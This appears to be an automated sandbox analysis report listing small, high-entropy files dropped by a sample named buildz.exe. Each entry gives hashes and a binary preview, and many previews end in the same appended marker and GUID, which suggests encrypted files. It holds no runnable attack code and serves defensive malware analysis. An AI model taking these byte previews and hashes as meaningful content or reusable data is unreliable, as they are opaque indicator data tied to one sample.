                        Preview:<?xml...I..6.x..b..>...p..W./..d.rX.=`5......y.h.08a.....l....O*.P.x..?=.q......)..R...-r.....<..<.....K~,.W.=...Ie..e.G.o.f.-2....G.OO.]k.7..K........3....X..:9N9...-.......Yc..r\6..\.6.......q~jc+sh.......bq....w8..D`o..0.K.@......<...z...u....A.e...sF..c.w.3......Z..LL".$`...']!..TV\.e....|.....Y.F..GG4..1.e.y*.*....8.....Q.x[p..J.E.h.s...W..s....D-....0.j......fq9..;yu.i..>..1V1.).............X*u.)b.m...Ni*.r.Bo.Z...z..6,.o......1Z.?,s.$f.P..r[FF....F...EX..|.Z...M.k.;@9....?..#*...9.?..a....[#.........(.s.n.c.rP"..(.E>..4..6L.2...k..s.....(7$/p./uJ.&u.c...h..~MJ....3.V...8.S._..T:8.1.QQ.H..e=.\,qcHG...a.*.o..$9sEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1044
                        Entropy (8bit):7.8223239054188385
                        Encrypted:false
                        SSDEEP:24:BsTB2u2yFzI4pnTpSd5IHYX4oh+nckGbUWOeq0sGbD:BE24zbpnMHhKGoUD
                        MD5:8F4A280858CAF1818BEDAD58733B2722
                        SHA1:69331020D47B78AFD88A838A9019FD10795A4553
                        SHA-256:B06B1C10486CAE5013EAA309229DE3FA6B3F4CBEE7A39D9201193BA176E719B5
                        SHA-512:517AC3CA3DE91ACD401B1AB227B56ACEC2B360E536FF59113343D4EFAEA42F9283522F794448B6CAF6FFFDFCFDE57EBDF011B367051DDBE988774A93E01A6F15
                        Malicious:false
                        Preview:<?xmlq... .:....^...`.|..!.....Y4..6I..k..|..7.....o... .$.a......>.e.e....[......6p.M..ew.h.5.f..l.?.cP..W).....f..........>.....D...i..5X..~....-T=w.."..|.K........Z...2.e.f.....x.P9...<........c6.5.....s.L2..k...2ud.Kg.cg..)yH...#..s.4Dw.:....eV>wY..t.....a`y...'...H.....\...yp?X.My.E.N....0.I......8.D..[.....q.Z..S....{.(.S9I.A...l..G..3a..&b...........#.....lO....&../R]...z.|..ZR.?...0S..l.#V......0Y.O.cJ.=...s.C.c...-....Y..f........es._9..aI...X"...q*(.+.M..2y...Y.G.?.G.... ...9-...a..=..n........$/-/;K.....s{*.w....p..$].L.x.u...h....2.<O.U.A..7.ZR....k.....V...|...t.....Y~...f9/..A#..f.{..H..r...^I.cg..1.v,..Tj.~b.8Z.Ks..?...G...r.ep.OQ..*.....0.f..Rs.......F.%~..D.m..E.6...^.A.mx9O.....h*...n..D..}(....2. .......x..4.<.. ..h.X..%.z...A:...@..F...{.r.._...x...J..O.&X.UQvk....o.M.(X.TZ;[!...3E..F....f.eJK.:.....iv.......8...d.....>.......5..........P.Z....../.#....=...qX.G....Hl..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):862
                        Entropy (8bit):7.727624155357594
                        Encrypted:false
                        SSDEEP:24:84WYABL7xvaLweSohMgx9wR+TJ/+YR6loUFnE9tfBwnGbD:8fBdL/M/xaRiD6pUBanUD
                        MD5:708E16D8D6F06A2A8DF8B7ED7CA69291
                        SHA1:13171E01FDFAEBA02D3AD1E2C34A6771856572F1
                        SHA-256:23C2E2A34911DC801C6B62904796F1018957CBD75EBF90E5E2203947687A232B
                        SHA-512:58685052AB34DB816EC554FA662406CCDDDD05C9A8641D05F6105E3A6E4CEFEA55FE796C0DB9EA1F0D899688D6A7AC2BE3378F8AE3F0F26E3AFE915B551DD07F
                        Malicious:false
                        Preview:<?xml...;..CZP0.n....x:n..DKH..9e....}F..d+0.....#.........7 _+..C)..[/.i....x...:..........!..G&..Y.s..0..83....y..(.M.R./}..25.`..of.(g.........c.TC.4|b.:6...X!U......'o....3.S...}...v.I.1..hh..._..........92...........bO=.........mk.I..QSE.&.......H..@.F...l%.......2.z.WO#.D.W...0.').8*@#.0.O..[F..).t.........T...!...-.I-.......]..#6.e....A8..S7.}0=..DG2I........W........oz...Uzh..rY.l.h.r..#<..s\....9!M..n..7...F.*.p.>&.B...4..[...H.Z..D=M.\....mQ...^.T._Z$O.\.T.....D..k.P......,#...f.k.K..p.]`..On.....{..AB.E7.J..-....5Su..b...'.~."]..+;..2.$....D`..........gn`._.....{....c.. ..op......]pE.A>...q..Dl.~.AU=. ....y..CP.4. `=..2C."...V4...(.?.d_.o`3(..K....f.L.&.`o.ev...c.._.l{s....A....u.V>.....Z...d2.....<..g..?..YP...?+Q....1.....%.(.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1376
                        Entropy (8bit):7.825973008509752
                        Encrypted:false
                        SSDEEP:24:dJPGvZNtSp9TrNeCV9Tcw1yn0xjOQ5Pe5+vXKXp/9l5XhuK4+uHT6eeVfuTpH9kV:dCNy9MCPAw1yiO4B699l5XG6WpdkD9xR
                        MD5:ADEBF5E3B0F47929492585AA2E8165E9
                        SHA1:786D22DBD8E7658679618BF7DF05BAAFAAC1623A
                        SHA-256:C700F5734BF0163BB221361D172848207869B5DB3BC57D7A8FE8DC85BC9661BC
                        SHA-512:F6F75A33473C5124EEA0043301A79CB3DFAC5FD6C237EC02A0CFB4463E8075853A82BB10D49A65FF73D94EC957EB1B1B964FC3E888ABDC75768E7648E563012E
                        Malicious:false
                        Preview:<?xml.@}.H..F.N........4.P".r...$.!...+.G5.k,G...cB......yS.7..?z..h+di!2...........g. ...Eaq..P..'.Q6l..Ig..\%...."..D...%...D....x;B..4./0..f....8'.J.3..1.>.h.'.9.....F....?.Wkf..d...?6."..&e.I..M..Z..^g6..dD+_..#...-w1.8..%..8..t5*.%.`. ./.v.z..7..I .|VF..7.R|...`.[t....$.]#6.lb.e..kC.y\G..n...5c./.\..>......W.Q.4>....K...i.T0-4W...F.^'...SB.&...T ..++$g.@...'.m....G..V.%.V!a9 k.8.L..h^...@(.#.>..e8..\....x....0$*..p,"...N.^....x.1<jD.r../d.<u.L.^3..!F..W.4#..^B.S....AC..P1Z=v.h..`.TU3:r$...?Qm'C....h..$.......|........^.."'.M5.Q..4.....y.E<5.$.b.p.i [nR.........\I6.]+...9....z_l#...|...hS.jI,. .?..p.<.F..c$7...^.T..H.&.f,.$.".1\.y...R2.....Z(T%..v9Dt3D..{7....J!.Nkw....Z.E.....w....*..F........W.T..91U..]X ..B..B.w...Q#...8........#q.93_*..h(.6.....r...l[..R....c...]'.....En}.ZW..>..3..:u.....X...v,.X....7.B...%Z.r]Qt".1.L.m..m.Bj...;....O.....g....)5_.....".....$.....;..}G.).6.b.X8.rr......h..a7.... !.....MD....Yei..M.{.........D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2037
                        Entropy (8bit):7.893971886198511
                        Encrypted:false
                        SSDEEP:48:aZBcdNBB4VhIJgNeZ9pnwytCdnommAoIMfgrQmZUD:aqPBewgNe9nwW8nRmlxfgNZA
                        MD5:7C763366079A99E6CBDA229DB2034C18
                        SHA1:6B6E1D115BA5ED2EA469F4C6B898EB9A91D2D4D6
                        SHA-256:63F80B1222370FC4EA689E9D985EE3BEE2B3D3BB1560E806FC96824C3A352E76
                        SHA-512:90502836EE2A1E12B3616BD504DEBC446E489B4A2E28F926C65140F0DD0FD686BB2CB6B5FA4C9B388ED307C7F1D2B00FF3F02529DB787CAA8331723205015C4E
                        Malicious:false
                        Preview:<?xml..t....0.o.B7.{.yKj.^.~%W1.xj.3X............H....b.q3ByQ.I..Uyn..=..K.u....VO^.%...j.X.e.V...;$.0.....Oa....au.r....>ZL....L{.a.09&;{..e.i...w.JU..c.L.w..%...OP...*._4i.SQ..y...n!w&q..tUK..0.QQ.kW.....K@|.R.....D~+:..?.aSo....h^....`...].<.%.,.CG....I..f.?....E.G..............Z..M&.d...)..9s...w..b...h,.....A....J..<g..[P.d..BQ...CF.......-%...l...._....JR.:.]r*_.|5\.}....v.E..j.R)..M.......Z..,SVs.j.T5-.C<..8.d`}.~V7/1.xP..r.^..9:..W.r...4..Sa.!YW.h.5.....J..:........C$..%.&.vie..:..q...9:.D....x.*..).*...u..>.k.......%....a....;.Q....4.Kd..~G.lf.yS..DVg.....j...^7..I...N...d.V..d.?.uW_R7!.+.'6....%5.\JM...H+;;(w)..n..7+.I..].H8.^........C.K...~.8F.......h...V.ZX.D.O.X.P..!x..\....f.w.....E..M...%...L..H.y..x&q..;Z...F:{+...Iz.y.u.....e....."..|.#!.5.3..>..K...MRE.....#}S........\(.~.O+.e$._.2.h3...kFF6..o.8.;.9.m.2h...^.....t59V....9h..B...z..R.l.D....D..B4l-...S........I..`.gp.:..+..r8._..q..R. ..`.%..d[..WW..q....x..!p.gG MC
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2074
                        Entropy (8bit):7.910267806942618
                        Encrypted:false
                        SSDEEP:48:rWQdS/y56CmIbp0OH3jCUGpZ2JIhTFSL7VyykKnlYnUKOiRUD:rG6cDIVp9CpTFWQanlYUYRA
                        MD5:EDFE8164BD1C3FFB4759E2D4E70DFA3B
                        SHA1:3233C4139F3A6DC9461BC07CB57B10104801635D
                        SHA-256:B31E1E260F8627654710143CC3C7A9D7F101B2ACA2962AE31B86E4DC9BAEB826
                        SHA-512:705F0E28063DF5BE30769B7C6D055E0849A274D6B6BDAD5776F862AEAC20C7646632E429CCBEA7411D99989E977242597D98F351901046E7D88AC8822234A6D6
                        Malicious:false
                        Preview:<?xml.Q\..I.X#...p..f..<~.g.B..>..rY<.9.?..G]....^vR.....W.I."-..i.$%....y.:...(..c....e....5..<...m.T....HC...O.A..^......!Q...z.9.U.k...!.......+.9...lbEB......0.?.Y.8.s~.b.k....F..F.....&."%oE..i................'.5..K`.,.1.V....o...m.E.U.<7..U.<U{tKW)FP.;m.D...j.|....g../..r.ne....|X.yH....<3..Eh......\.h..ODJ.+.....5,B~.T..wTW....y.49.}..!.{...Ix....k..O...l.p..+..f?o.j}...3..B{.].........X..w........)Q.O....$.................fC.q...`.Em..h-{.....%....W(.H..".QF....8..?.xA.@J}.q.....N?.8...I../...A...t......5.p.m......*i...|.a.K.n..L.,...&W>.$.[......s.y...C.....C[yK.;....l|.\.2.._.6..T....I..j_.0~.-......x.;..X..|.O...>.A..H... .*J..PyS,.>.%.t.:.2..&.I....o..j.JZ?.^....o../r..A.3. ..C.5a.........t.%^..9(.W.?j..V..bVs_d....y...p...........\.DIv[oW.8VD.=..nAi..e.B..p2..ek.UG'.[lj+S?XV?........W...@..|..2#..-8..[S...'..xf^\8.c y.Y}.G..o..c....UJ...KK...n.kR.<-..2.....L.,..V..R.v...../..^9..o.d.^\...+.r.I......R.."..=.c...z.... P+...].'V/..i.o....>
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):878
                        Entropy (8bit):7.708503744717963
                        Encrypted:false
                        SSDEEP:24:z3/3Vx+4YQg9oazeSLquwA2fR4uqTgwaGbD:j/Fx+Ywzzeqqun6R4ngwaUD
                        MD5:E39736820FAB42289D6B71B83E951F66
                        SHA1:12D4E16C8E739DC5D550D1459A190C5EE9EDABDB
                        SHA-256:C600A9A370AF231E2ED9649DA5D063BCE454B24457069411CFA83C906A7803DC
                        SHA-512:D23B1810EF7520CB3990F8E87984CB38672B61C96CAEDC529CDB6DED05CD5B496235F8B922CA4E49F2AEA9FD1ECC31947354D019615DBC1D9A20FF2D24B37139
                        Malicious:false
                        Preview:<?xml.Do.~..N...).W3.....Z?.."2...Tx..n....Fd,..;,.?U.s...2..d.2....~.F....]_ef.../...4....N}.i.S@.G.5nI..."Vr........../.,.Z.n......=n..$I[....<.@...A....3.......p..C.y,-!.)f4...L/....8...*.dhBoqhg./..F......p...a..ow2.p.C-l1..b...E...z......9^8.U....T..G...?.l.h{.g.Q.L.p..I.!Cm.M.E^6..m...5.$..X.?A.%....'.B.]......oK.O.H7v"8....z....P..(av..a....'.GP.'.......+..*..c.]....g.$...Zb.v..`.T:..E..A.!.7....FD....\..'.T...^3.r......T.....,..oU9k....Z8oP..7.j.9..@....l..O ..&.........U.Q.,$.......]...l..3.u.n..N.H6L.\..h..9......0.R.(..K.....8...<';.Ea.(.u.B..bs.Fq..k..1..I.....P...ERV..W.gfZ ...d.b..~o....I!.,....6.Vk1JNg..`4.....fg^.<.N.|&`{....M;~..&...J3.-B..V.%.d.....m~...........D`...2DZ........l.S...rq.s.....$.(...@sE.IdE.....c."..'5~<.D...I`.(,..\EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):726
                        Entropy (8bit):7.718666538300341
                        Encrypted:false
                        SSDEEP:12:vlKharv9IO7zSVuGAuko6Vl9KBFi6ug2JqaKsz7ZQHYLbDAk59meGQ2M/26Gciik:vlKOxKZAuR6sDvrsXZQ0bDAk5c1yGbD
                        MD5:5D0414D8245DE0C3D201F4128D2A9609
                        SHA1:82AE5B395F31D016E60E76BD1808F10FDF11C988
                        SHA-256:770958B6F006626B887CC94F380E7BB595DC13A4617C4BE758D45285515CCFC3
                        SHA-512:DF95C14B218EADE0844919DBF306F8698FEC75DF010EE061C03C72AB05CF1AD3C4BBD8A1C67E9E137552A7BC321BDDE4B6ADFABAC4C994C6D397D11ECADB25AF
                        Malicious:false
                        Preview:<?xml..L...s.v_....O.........[.. p.Rj...Y.R-Q..*...G..h..sH".~UL.(q..........oR.^v...^c4^J......0.A.~.+[%-........};.*.Qr..|.e.....\l....6..G.1.N....9p.(....2.jX"......wY......`V........!....x.......q....n.....gV..(..u..Kd....=......l.a..'......f.Tw.e.......e.m!...p.vVco..kPt?.H.]M.....u...n......1-..n.....L..w'&.=y.o,|....{\.Z.K\.O.f,...:.].TL........L....KVr.;..TCF..i.%r..=w.....AS..r..m..V...}..4j.+J...p.i'....q&..0.~...g'u.*...sV4..=ZK..|....O..+.'.X........Ek.s...uz....A...R#DQ..h....hO7..fsH:.\...C.^^...h..uX.......~...e.......pAZW.x.5..Co^G...d.V.5..8...../...?...9.Hj..0..@..k....$.<i._..z......;Tzp.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1685
                        Entropy (8bit):7.872104509785859
                        Encrypted:false
                        SSDEEP:48:4p9ITqwPgWan8yK9oz9786+zcCWF3ByG9rw7UD:ouTqwYWan819oJoFzcpByWrmA
                        MD5:1F418C26524843D03F00D7D762D8D969
                        SHA1:7A515478D63FC72340B51F4F13116EC281F11F31
                        SHA-256:B1BF916A86BDDB474947D5F52D5C2129259BE5C69CE2C4417C356A189BDFB1D8
                        SHA-512:0CE0288F7709BBEC4710E964357B6DA361FB56DFCA9C91BEF828662072AC0579A734B15D510CB87B4D7926D1DB624119FEACD9745449ADAF57C0B74B70DEF854
                        Malicious:false
                        Preview:<?xml..@......^....._...&...k._ .....{+..._.U...AQ..l@M.&.\<.q....2m_.......Xo..C.>".]....%./p.a..*.$..+.#C@?....i.`..40......n^....6..@.......,^..]rK;..6_..9.....># .y.^WW.CwV|fn3.p.....Q-..|.ti....r.#k..R....0....?..ru=..f...3N...X.|...m6.....A.....S........./.>....._1x.4..'>J..Y....(....j5......`.....W.JP.~...1..Aa3...!..)......U.yW<k..\..M.?....:a5.B.[Ma....U..^.[.`... ..1..P..gBw0...D*.0..&..O.7#`....k.W....."...Sm.P....s......{.5..}i\......;w...)~.A.{O.Rq.6...R....H....C.U......X.. .Xi.8..,..h2....5>(.[..[...^..v*......b..Is..|P.^....~+y..[..@.R.t.X.._I..1}.........k.Xa.m^..tr.s(PP.......N.c...y.K..@..i.....l....F...k9i.5.\.f.{Iz4....|N.H.k@......H.?....x(....9..6.LI.......3...J3...Z..d.;..S0.x..]..5L...l...S.%.4.(&....8...&..`.]4...b'.Zx0...N........I..PNG....n...4B.........h"..._..._....]..%;.!.....&....P....*..,.!]..(....._.....a.:.<b(@.y...,...-.9.'g......&..e.ji6R.F.Rh...*t./..."....f.h...aWJ...(.....W.+...{...&....<..%
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1722
                        Entropy (8bit):7.859759387925179
                        Encrypted:false
                        SSDEEP:48:rxMPHdBmBKfo5F2ODtw7Y3V/i4fhYBBJQOOmUD:iP9BCKfeBtcqc4piJPOmA
                        MD5:536F7B30C9F53A712C3A8CE1A1CFB3A4
                        SHA1:8745431EFC60E5B8AAEA56E4B7DE9AB54908A371
                        SHA-256:08144C10CF64BCD77C25847B7215BBA8418F2A211D4F487144F1259EABE4AF2C
                        SHA-512:AA967385F3D035196CFD045A42D1A50330A726B47826A88610AEA4425142CB2F3946C0D58956B2E61C75F2A274B6D6EEAF3B02A7B51887822FFF7288760DE483
                        Malicious:false
                        Preview:<?xml+.8&.[;....7.JznZ..k....n.O....S..^)..-H.#"..x7...~UI.C....a.....g..b....)Z...D...\..........4...n....r......*....f..9Cg.w.F.S..P...DA5..0b.C.{.f.:..&n..E3z..._.v9.3Y-...d.8..X...N..K.J&.(.....p....XFUm!S.....2,....R.."..i./..;Pd.L.3..E.0.k.Fg.MI...A.H..f8.`...G..C.eo!2...m.14..3\.....PE\..B.i........~...z......I..j.....|..*.H.>6vIH.f.s.........-........0..-...0...v..+..... ..T..+.&....H.........B._.L......G..gI.g..7.x.z..%R....A...$.Z.q2d=..\.2...L..ry.......I:qL...k.y..5x8...fH..s......Dr/.(Q..:L.h.Oq.....*..>6...Zf.y9..p...cN3........Od...p.xD..c.cG{..,4E..Z..E..l...1.n:~.{.....!..-a......k.~.Q ..%.hNF...A.L..`..!&.-..#.|-.....xSEz.|.....F....w...!E"D..xg...\.?.%./;. ..BB....r|"...y..vY.'E.v4FC......z<.Z....k]....R.vq.V).......*.......K..I..1.\....<...e....A..D..-U..N:...9...Z...u...q>...JM.5U.T..hL6.}W.i.T..I.~....1ez..~.|..p.2......0?av%.....X.h..b-.........#...I.;.k..D.O}Hl."z.=rf..E......V....B.m.}@5...9.VL...|....Vp.....V5n.....Z.}M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):764
                        Entropy (8bit):7.690520373118224
                        Encrypted:false
                        SSDEEP:12:RlTG/5x9PQQYD7KCWSZuZy1WRCgCwAEL4XJY3iE7JNG7699SoIZOc86U/26Gciik:RlTGZPQQYiCWPZy1WwvEL4Xy3bJN+QLI
                        MD5:AD9432C3B18726E4E860744B98CA9683
                        SHA1:CB9AF0C26AB3AAF26F5FE572C662AF9943762719
                        SHA-256:04EFA1D10A71EAF68223E6ABD593C865A7B64909C0B1CEBB409B5CF6DCAAE0E9
                        SHA-512:AD5D2B8CCE167E97572CDAC8C8E073747435E8A8B937C409CD1514139CBDD66AAF3136B4410A05FDA9162F64F7447AB707B20B2B9785EF164307138A07043488
                        Malicious:false
                        Preview:<?xmlL[..y..2.xb..No(.......l..R9.|P'W..A.....I{...|z.a7....f......}2....G...rp.n.54..K....D.P..D...}.y.L*.B.#..Q... .7...be.....:..s........,....!r.......o|.b.f..(....G.....M..AF.+ ..v.r0.p..e.aB...W3.....o.....g6...t.......3Z...-5..'..R......_...G$.p..sB.....|.....9.k.{..........6.....9O....h....7.D.Z...v\f..f.MA..qdt$.{..H.[k9............:?.hA.*.l.f.U5...Q"D.Y.gG.....e9.C.#.f..6hQ..O^....M).....6=bP....YG.9....V.......(.Z.|!...sf6u...&..)..#$D..w.k..S.hj8...n.N..QKa.......\Z;u.j._..o....{.xbm.9...h].[g.d.\..OK..4]e...........-p......v.El#..fu.A.&..2T.a.?j!r.6.:Q4.=....9..c.]....]...t..7..........?f.....:#.4S....._..9..*r._64U.z.....~r|..3......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1691
                        Entropy (8bit):7.879126329573797
                        Encrypted:false
                        SSDEEP:48:v7/D7zpVg8gwdvzS5WvNke01jP7xBGBgkc3tHUD:bNVgGYWZ0RXkc3tHA
                        MD5:9C776CEA51F62C933F3A190A32A891BC
                        SHA1:F2903BBA45AA35CA4648B78875CD32C14E803635
                        SHA-256:7E440C3738653DD278427983068341AA94AD9D57573C3B9E84318AE18194C23E
                        SHA-512:D20FF0AAB9D5A3F1471C9DD98FC24892DF0DD65EC3EA2CB85B26789438DF3F2AD56B05745F31C11256BEA6ED964883D6BF7125C3237EE3E69C1FDD5CAF867CB3
                        Malicious:false
                        Preview:<?xmlf.V.B'3....Yg...v.H......Z9.c....c......Gv.I...pt3...F...@F3..w...g.7>..U......6....S}.]...9...V.9...c....z..(...!%|V:..c-m.H.........*.)C.7s...."/. {..sx...8.Y*R.=....?}p..6i.thr.M...~..Z..G...s(.mr.ae.)..4X....J.Z....jh.X=.....".....'..e..q...9..d.D......g......4.!h.],..d?0../a..4Xy...O..{X...W`|eaHo"?....)...T.H.Z.y%}.@.yY..pE]Q....hS..z2."QG.!...l.w......#..2...H...c....P..M.;.O..u..4%.jF.U..\.._hcZ..U.Vp.S....PU.8..l..6...LH........3.....:..W..d\...a.>.g{3./.I.|...f.o{..|h....+.y....z.1..n.zl..3E>.4wD..A.*6.p.n.=o.MEd!.Q.z........-.......Q......,..%.S....8Q+..tO_?.uh=/....+.3..'..Y:o.l3....7..#.v8@...XgK._..*...G..nl.....J..a....euk.!... I..Lbl..{..*..{]..^.....).[..`t7...n8?:.#..e]oK.eR'.A.:w.._....t$...Wa...w...~.......k...2W`..............n....+"Y.......$....=.7.K..]k-k....X|B.?R.ik...*....m...#.).QG;.}<.An.M..+.UR?3#...t..~0...H;9jB..i.PQ...]........N=...(.~.A...;.K^!...(.y....l..M...P>..K~r.I..S...B.%Q....X.w...#..v...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1728
                        Entropy (8bit):7.870842275384691
                        Encrypted:false
                        SSDEEP:48:CZXNnYieafuWJEFD1/Myosj9owbe5kevLg1qZkUD:Csi5fuF10y9+wb7evLqA
                        MD5:A6578A51ED3FE46C2FC83799D6D37C72
                        SHA1:0EBA9B6A751A68A5B4644B8F2E3B39294601E467
                        SHA-256:8E09BC13EE6227B14A3ABB611B8DAC4951D3489670C27804970EB68AA526AB72
                        SHA-512:D1741CADFBDF7B8D032F3454ADC54001692FA341CFB202571683967889CC3629C4597E8E801602A6D4404775389DFB7D8E71BA7FC991B19254B54954B4F9C06C
                        Malicious:false
                        Preview:<?xmlz...J.n....1...D.Q..^..T...&!c.w..v..%.#....W.#..F&rG.V......J.....Y..}.....*?D.*xv.<K".k.Pqs.UXP...-..I....?..f.i.G..j.|N?...z.Po..K.$%.....m.1....,..J...4?.K......<:..q.c.xd.\.k..fvC..y.6..e.G=.{lc.914.L.5.y(..m=..>l....y.v.$f..5.z+AP.Of...S.+.....d..."_.(."..E.....};.......m.'...a..Af...;....*b.~7....`.#.s.S..V%........z...^}......B.C..`...,8...S..1.&y..k.N..M.K...2@.U=@....g...r$......J.4/..h...'A......eo..B..-O6.8...r.E..uy.}K8.l.[.O..i......J3...I*3.~.].Dc.......7lHX..HNfY....L~.r .J..39.....w...S.....J.*..!}j..4..F..JC._..O...kR.JR.4....2.(.>.l..J...B..;Qma.:...V........7.H...D*MR!....;.~?u2.H. fA....W...d...;gP..a..n...;"..Z.,+..".R..O,ni.xF.[...q...77..U.........b$.}zk..c.U../..C.h~..Y^......g$.$...I.....g..R..'A6.)?.&..f....M_..*z0A.z.q>....c.N...b..5.......{....u.{..}.Y...ZV.SA.e.oIl..N......1/a.%?..../3......|.&?. 9.y..0..eg..n.....3......b...!.z.....k....5...G.@...X....}...ep...5..T.).L..?d.0.K.n=..U....?..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.883184661483636
                        Encrypted:false
                        SSDEEP:24:Y0O7uay6lENkTkh/Fjpl5fQo0gDVMFyDiN/Gd9SF4Oecb5gmbA/zjLh7poLj77KW:YKC1khIo0PyGNe/6K/LsLHtUnj5UD
                        MD5:AC82BCDDFD30C23613C7D43F74090D90
                        SHA1:87E91E48C2FA9591913122704866CDFD5811BC24
                        SHA-256:181875012E878AC2B1060E1349EF856C9D7241AC2BB8DC008C1F357246609986
                        SHA-512:420EF9772CC8285A090EEB31549D88D758BE9568AD911BA05750AAE96B86D1A29656933B6D6CB553728ED31EC6209CE65C0FAB62CDF1D2E0E0ED3C59429C3969
                        Malicious:false
                        Preview:<?xmlpoP.t..x3...D..P.GD.0...mE.7]....>3hp...F.!....z.U..e.`.+F....4.X.OBKE.i.u.....7.{].SJ....n....:.Y......[.....2D..8....8.5p....H..4MSe84..^..F.<....q.3.FA..j..U..z...#A$m$..2..ns|.h...F8L%..%j.ted. .\.Xp).8.ro....H..^z@;,.....\.}+f....y..p9?...f.8`.).E..'.X.g.RZ.bJ/..I.../.9..".....T....7*....K.=e%.%..0.3........f.){=..K..LK..7..H.|..W.M..k....,. .;...6....VRM...?..e.q...+.v<x..yF.+.t'&....q.`...A .....e.A.a.h...b..=,.1.b~..^... Uk.ef#Tg?.b.._FS... 7....F....."j>..QS."..v7.@..N.`............P......wv<.....F.l6A.r.%..Z1.87......2......P.u.....+.N..S.........S..K...p.r....3...1..Q.....{.s.K.2.f4....*......y..[.<.O ?..,.....j.x.~.H...;$N.$..2..J.q.r).8...9uXS2..>d4.....&e%i6...Y..h...d...C.x..G...}..J....=*.Q.Q.z.'..7k.|z......={..e .........#..&..B..$!..YQ..m.Q$K...K.|....[.qe..8..+J}.U.{......o{.U.H<.2pR.......9^...~.S.[Q8.b../...o...D.+........6N%:..=_K..wh..*=..T\Y...1R3..|.$xr..4...A...7.$..o.}.a...>m...=3u.b.\-.wmF...oiD ...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.90248173842623
                        Encrypted:false
                        SSDEEP:48:uLQXZePjaV008O2U7Y4C4uyD2GM2LpamrgCnmT3MFIUD:uiZePjaV0QtE493DNrLMmkR8FIA
                        MD5:5DED5AB8499E0E2247CD17450053262D
                        SHA1:3D3E4F7A446D642E423709E4D3E051337D3D103F
                        SHA-256:AF17B47EEB7659FB112600AC806FF269BEDC18A78B75FCB985FEA5E37BC3CB01
                        SHA-512:A5DE138AD03DD883BA1070A9E41EDA39F5A814C0C8E33834658DFE4FFCE2DE6D27DFABD7FA056F70A97648E5030D4971B7268A4287DCBCAAA2ABE75D9C756280
                        Malicious:false
                        Preview:<?xml.\*..G..g..s.;4..i......).{*.....dM.7..eX.c..Q.;..U._~d......$..&...C.>h..a.y..za.s...M..<.......K...n..s...N~!....b:>..$+58..6.......B{.=.g-..US.o.0..%Qw".>nm..yMn.sc...b....,...:..6.H.yi..].h..-i..uj$.F'.9.5G.J....4...Vv.H<.pc....'h.".d....~z.n.... .Q..~w.._.Xu.%...?.Nh..|[L.9....w...\.I.]...x..J.}..O].....t.5.A...E.G+Vm..(.~O....o..R...,s,.D).=..}...w.SS..Xx.5{(.un...e.........|!.,.<$B._.......G.!B.9.@qQ...!_yK..w: f..Nh]n....'G.\...46..&..:. b!.ON'S.!.p.....z..DbZ.u.H.)f...jX?.X...+......O..%L2..3g|..?..."..:.c.0.E..K..... .H6.....3.E.)g.!..#.8...B.).N.Uf..@`...z....1.W..].....'.3M.b3..X.!...s......M.iJ6^/.S........\y{w.p......$...;.....1......wf...6...^.M...Eu...;..g.]...>KH3...z.}..I,...|.Q...e}....l....3....)Ee...a1...;..k.*....w.=3.H.uP..$].9.i.5.........VQ..{..`..U....h.^.......7.W...r..~.Pd.p.Vp...+.n i...`!K..:N....;.C...(.j.. .E.j......2,..j.f.y.9xC..PD.`p.v...P...\..4.JT:.......1...1....:%^.}.....o...?..E4F......z...uR...'
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1689
                        Entropy (8bit):7.87876062600718
                        Encrypted:false
                        SSDEEP:48:XjVvB/MieUk/VTbXRkZ90712sh5aMvZEUD:XjjleXnBqS71B5QA
                        MD5:255781B58972A2C37DE1AC20C4857DA5
                        SHA1:BA661B0CF3E4467E8A78A8CFA629E34DD4B70B9C
                        SHA-256:F02EF24E5805096154E082565CAE279F1E5685A17F064A06B4D2A58636B338ED
                        SHA-512:660226AB9378E4AB53889CBDA2E6894FC9E7F1FF8497D7A76BA234D020B7661B375AAA4541AB0675459EA912BE5D4D2A4674D50B329D249C57D787B0EC07CB3B
                        Malicious:false
